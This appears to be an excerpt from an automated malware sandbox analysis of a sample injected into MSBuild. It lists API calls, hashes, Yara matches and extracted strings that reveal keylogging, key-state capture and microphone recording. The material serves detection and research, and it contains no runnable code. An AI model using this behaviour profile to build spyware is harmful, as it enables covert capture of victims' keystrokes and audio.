                                                                                                • API String ID: 481472006-2430845779
                                                                                                • Opcode ID: e323eb18b09671bd9cbe44923641e42d4692dea33ff4013e306842207c2faf3d
                                                                                                • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                • Opcode Fuzzy Hash: e323eb18b09671bd9cbe44923641e42d4692dea33ff4013e306842207c2faf3d
                                                                                                • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: alarm.wav$xIG
                                                                                                • API String ID: 1174141254-4080756945
                                                                                                • Opcode ID: 054ac4d72a5f6625c92cf13b9f3ce639a7eb8cc6a9706969532a55276df875d1
                                                                                                • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                • Opcode Fuzzy Hash: 054ac4d72a5f6625c92cf13b9f3ce639a7eb8cc6a9706969532a55276df875d1
                                                                                                • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                • String ID: Online Keylogger Stopped
                                                                                                • API String ID: 1623830855-1496645233
                                                                                                • Opcode ID: 1eedcd68fc151329db4f786996e900c0e7f98fcc45309d87ae2c3f133c66d4ef
                                                                                                • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                • Opcode Fuzzy Hash: 1eedcd68fc151329db4f786996e900c0e7f98fcc45309d87ae2c3f133c66d4ef
                                                                                                • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                APIs
                                                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                                • String ID: T=G
                                                                                                • API String ID: 2315374483-379896819
                                                                                                • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                APIs
                                                                                                • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocaleValid
                                                                                                • String ID: IsValidLocaleName$j=D
                                                                                                • API String ID: 1901932003-3128777819
                                                                                                • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog
                                                                                                • String ID: T=G$T=G
                                                                                                • API String ID: 3519838083-3732185208
                                                                                                • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                  • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                  • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                • String ID: [AltL]$[AltR]
                                                                                                • API String ID: 2738857842-2658077756
                                                                                                • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00448825
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast_free
                                                                                                • String ID: `@$`@
                                                                                                • API String ID: 1353095263-20545824
                                                                                                • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State
                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                • API String ID: 1649606143-2446555240
                                                                                                • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                APIs
                                                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 1872346434-4028850238
                                                                                                • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.3174587435.0000000002DDF000.00000004.00000010.00020000.00000000.sdmp, Offset: 02DDF000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_2ddf000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c6651337c1f4b72587a62ad46b43f18b5ca31dc96388ea372a26f0d8357ff378
                                                                                                • Instruction ID: 3d7c95b38243080f936720715d358e8e804da2fa2c3af042622c1734302909e6
                                                                                                • Opcode Fuzzy Hash: c6651337c1f4b72587a62ad46b43f18b5ca31dc96388ea372a26f0d8357ff378
                                                                                                • Instruction Fuzzy Hash: CC51D3A584EBC69FC3135B7498282647FB4AF0B254B1B45DBC0C5CF9A3D6690C5AD322